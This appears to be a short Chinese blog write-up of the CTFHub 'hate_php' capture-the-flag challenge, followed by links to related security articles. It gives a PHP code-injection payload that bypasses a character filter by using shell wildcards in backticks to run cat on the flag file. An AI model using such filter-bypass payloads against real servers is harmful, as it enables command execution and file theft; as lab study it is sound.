技术栈

CTFHub-hate_php

九尾w2024-11-18 23:45

点开链接,有源码

过滤了_ $ @

不能用定义变量的做法

用取反操作,发现环境限制,也不行

利用通配符来匹配文件路径

/bin/cat flag

?code=?><?=`/???/??? /????`?>

划到最下面

上一篇:开源 - Ideal库 - 枚举扩展设计思路及实现难点(三)
下一篇:Mongodb
相关推荐
迎仔
5 小时前
05-AI与网络安全
人工智能·安全·web安全
临水逸
7 小时前
一次路径穿越漏洞引发的NAS安全危机:飞牛fnOS漏洞深度剖析与用户自救指南
网络·安全·web安全
JMchen123
7 小时前
Android网络安全实战:从HTTPS到双向认证
android·经验分享·网络协议·安全·web安全·https·kotlin
hzb66666
8 小时前
unictf2026
开发语言·javascript·安全·web安全·php
Binary-Jeff
14 小时前
一文读懂 HTTPS 协议及其工作流程
网络协议·web安全·http·https
lingggggaaaa
19 小时前
安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征
学习·安全·web安全·免杀对抗
介一安全
20 小时前
【Web安全】XML注入全手法拆解
xml·web安全·安全性测试
QT.qtqtqtqtqt
20 小时前
未授权访问漏洞
网络·安全·web安全
ShoreKiten
21 小时前
ctfshowweb359-360
web安全·ssrf
ba_pi
1 天前
每天写点什么2026-02-04(2.1)信息安全
安全·web安全
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南06Linux下V2Ray安装配置指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08Claude Code Skills 实用使用手册09OpenClaw Chrome扩展使用教程 - 浏览器中继控制10Vue-skills的中文文档